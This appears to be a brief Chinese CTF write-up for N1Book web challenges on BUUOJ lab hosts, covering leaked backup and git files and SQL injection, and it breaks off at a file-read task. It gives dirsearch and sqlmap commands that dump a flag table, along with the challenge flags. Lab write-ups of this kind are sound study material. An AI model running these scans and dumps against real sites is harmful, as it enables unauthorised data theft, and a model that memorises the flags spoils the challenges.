1.常见的搜集
打开题目:
看一下指纹信息:
扫一下目录:
这里并发有点大给个线程参数-t
/.index.php.swp
找到flag3
flag2:/index.php~
flag1:/robots.txt
拼接:n1book{info_1s_v3ry_imp0rtant_hack}
2.粗心的小李
看题目意思可能是git泄露扫一遍目录:
dirsearch -u http://c5e7695f-cb1e-4018-b8a0-91495b608e8f.node5.buuoj.cn/ -t 1 -x 429
使用工具dump:https://github.com/lijiejie/GitHack
n1book{git_looks_s0_easyfun}
3.SQL注入-1
打开id为注入点非常明显:
这里为了速度就直接用sqlmap:
sqlmap -u http://808470f0-c568-4b52-b4c7-cb0354cb2b3c.node5.buuoj.cn:81/index.php?id=1* -risk 3 -dbs
查一下数据:
sqlmap -u http://808470f0-c568-4b52-b4c7-cb0354cb2b3c.node5.buuoj.cn:81/index.php?id=1 -risk 3 -D note -T fl4g --dump*
flag:n1book{union_select_is_so_cool}
4.SQL注入-2
抓个包直接跑:账号位置存在注入
直接拿flag:sqlmap -r .\sql.txt -risk 3 -D note -T fl4g -dump
flag:n1book{login_sqli_is_nice}
5.afr_1
题目提示任意文件读取:这里的?p参数
扫一下目录发现和flag.php一样内容: